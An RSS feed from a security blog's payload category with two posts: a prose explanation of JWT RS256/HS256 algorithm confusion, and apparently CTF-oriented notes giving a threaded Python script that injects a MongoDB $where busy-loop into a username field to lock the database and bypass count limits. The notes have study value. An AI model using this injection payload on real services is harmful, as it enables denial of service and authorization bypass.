<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Payload on whguswo</title><link>https://whguswo.github.io/categories/payload/</link><description>Recent content in Payload on whguswo</description><generator>Hugo</generator><language>ko-KR</language><lastBuildDate>Sun, 14 Jul 2024 00:00:00 +0900</lastBuildDate><atom:link href="https://whguswo.github.io/categories/payload/index.xml" rel="self" type="application/rss+xml"/><item><title>JWT Confusion</title><link>https://whguswo.github.io/posts/jwt-confusion/</link><pubDate>Sun, 14 Jul 2024 00:00:00 +0900</pubDate><guid>https://whguswo.github.io/posts/jwt-confusion/</guid><description>&lt;h2 id="refer"&gt;Refer&lt;/h2&gt;&#10;&lt;p&gt;&lt;a href="https://portswigger.net/web-security/jwt/algorithm-confusion#deriving-public-keys-from-existing-tokens"&gt;Portswigger Document&lt;/a&gt;&lt;br&gt;&#10;&lt;a href="https://velog.io/@thelm3716/JWTvul#%F0%9F%A9%B8-exploitation-2"&gt;JWT vulnerability🩸&lt;/a&gt;&lt;/p&gt;&#10;&lt;h2 id="info"&gt;Info&lt;/h2&gt;&#10;&lt;p&gt;This Problem is JWT confusion.&lt;/p&gt;&#10;&lt;p&gt;RS256 uses an asymmetric key, a private key for generation, and a public key for verification.&lt;/p&gt;&#10;&lt;p&gt;HS256 uses public keys for both token creation and verification. By using the difference between the two, authentication can be bypassed by extracting the public key of RS256 and creating a token with HS256 when verifying both methods.&lt;/p&gt;&#10;&lt;p&gt;Key extract : &lt;a href="https://github.com/silentsignal/rsa_sign2n/tree/release/standalone"&gt;https://github.com/silentsignal/rsa_sign2n/tree/release/standalone&lt;/a&gt;&lt;/p&gt;&#10;&lt;h2 id="exploit"&gt;Exploit&lt;/h2&gt;&#10;&lt;p&gt;After Extract key, you can sign JWT as You Want.&lt;/p&gt;</description></item><item><title>MongoDB Race Condition payload</title><link>https://whguswo.github.io/posts/2024-01-30-mongodb-race-condition/</link><pubDate>Tue, 30 Jan 2024 00:00:00 +0900</pubDate><guid>https://whguswo.github.io/posts/2024-01-30-mongodb-race-condition/</guid><description>&lt;h2 id="information"&gt;Information&lt;/h2&gt;&#10;&lt;p&gt;Target: &lt;code&gt;MongoDB&lt;/code&gt;&lt;br&gt;&#10;Vulnerability: &lt;code&gt;Race Condition&lt;/code&gt;&lt;/p&gt;&#10;&lt;h2 id="desc"&gt;Desc&lt;/h2&gt;&#10;&lt;p&gt;MongoDB Race Condition Attack with db lock.&lt;/p&gt;&#10;&lt;h2 id="example"&gt;Example&lt;/h2&gt;&#10;&lt;h3 id="code"&gt;Code&lt;/h3&gt;&#10;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#75715e"&gt;// admin.controller.ts&#10;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#960050;background-color:#1e0010"&gt;@&lt;/span&gt;&lt;span style="color:#a6e22e"&gt;Post&lt;/span&gt;(&lt;span style="color:#e6db74"&gt;&amp;#39;list&amp;#39;&lt;/span&gt;)&#10;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#66d9ef"&gt;async&lt;/span&gt; &lt;span style="color:#a6e22e"&gt;getFlagList&lt;/span&gt;(&lt;span style="color:#960050;background-color:#1e0010"&gt;@&lt;/span&gt;&lt;span style="color:#a6e22e"&gt;Body&lt;/span&gt;() &lt;span style="color:#a6e22e"&gt;listDto&lt;/span&gt;&lt;span style="color:#f92672"&gt;:&lt;/span&gt; &lt;span style="color:#a6e22e"&gt;ListDto&lt;/span&gt;)&lt;span style="color:#f92672"&gt;:&lt;/span&gt; Promise&lt;span style="color:#f92672"&gt;&amp;lt;&lt;/span&gt;&lt;span style="color:#a6e22e"&gt;FlagDocument&lt;/span&gt;[]&lt;span style="color:#f92672"&gt;&amp;gt;&lt;/span&gt; {&#10;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&#9;&lt;span style="color:#66d9ef"&gt;return&lt;/span&gt; &lt;span style="color:#66d9ef"&gt;await&lt;/span&gt; &lt;span style="color:#66d9ef"&gt;this&lt;/span&gt;.&lt;span style="color:#a6e22e"&gt;adminService&lt;/span&gt;.&lt;span style="color:#a6e22e"&gt;getFlagList&lt;/span&gt;(&lt;span style="color:#a6e22e"&gt;listDto&lt;/span&gt;.&lt;span style="color:#a6e22e"&gt;username&lt;/span&gt;);&#10;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="exploit"&gt;Exploit&lt;/h3&gt;&#10;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f92672"&gt;import&lt;/span&gt; threading&#10;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f92672"&gt;import&lt;/span&gt; json&#10;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#75715e"&gt;# Logic Vulnerability - Database Lock&lt;/span&gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#66d9ef"&gt;def&lt;/span&gt; &lt;span style="color:#a6e22e"&gt;lock&lt;/span&gt;():&#10;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; res &lt;span style="color:#f92672"&gt;=&lt;/span&gt; requests&lt;span style="color:#f92672"&gt;.&lt;/span&gt;post(&lt;span style="color:#e6db74"&gt;f&lt;/span&gt;&lt;span style="color:#e6db74"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#e6db74"&gt;{&lt;/span&gt;url&lt;span style="color:#e6db74"&gt;}&lt;/span&gt;&lt;span style="color:#e6db74"&gt;/admin/list&amp;#34;&lt;/span&gt;, headers&lt;span style="color:#f92672"&gt;=&lt;/span&gt;auth,&#10;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; json&lt;span style="color:#f92672"&gt;=&lt;/span&gt;{&lt;span style="color:#e6db74"&gt;&amp;#34;username&amp;#34;&lt;/span&gt;: &lt;span style="color:#e6db74"&gt;&amp;#39;&amp;#39;&amp;#39;admin&amp;#34;, &amp;#34;$or&amp;#34;: [{&amp;#34;dummy&amp;#34;: &amp;#34;dummy&amp;#34;},{&amp;#34;$where&amp;#34;: &amp;#34;date=new Date();do{cur=new Date();}while(cur-date&amp;lt;5000) + 1 || true&amp;#34;}], &amp;#34;&amp;#34;:&amp;#34;&amp;#39;&amp;#39;&amp;#39;&lt;/span&gt;})&#10;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; print(res&lt;span style="color:#f92672"&gt;.&lt;/span&gt;text)&#10;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;threads &lt;span style="color:#f92672"&gt;=&lt;/span&gt; []&#10;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#66d9ef"&gt;for&lt;/span&gt; i &lt;span style="color:#f92672"&gt;in&lt;/span&gt; range(&lt;span style="color:#ae81ff"&gt;10&lt;/span&gt;):&#10;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; thread &lt;span style="color:#f92672"&gt;=&lt;/span&gt; threading&lt;span style="color:#f92672"&gt;.&lt;/span&gt;Thread(target&lt;span style="color:#f92672"&gt;=&lt;/span&gt;lock)&#10;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; threads&lt;span style="color:#f92672"&gt;.&lt;/span&gt;append(thread)&#10;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; thread&lt;span style="color:#f92672"&gt;.&lt;/span&gt;start()&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It takes a long time to count the number of existing documents in the DB, so logic such as number restrictions can be bypassed.&lt;/p&gt;</description></item></channel></rss>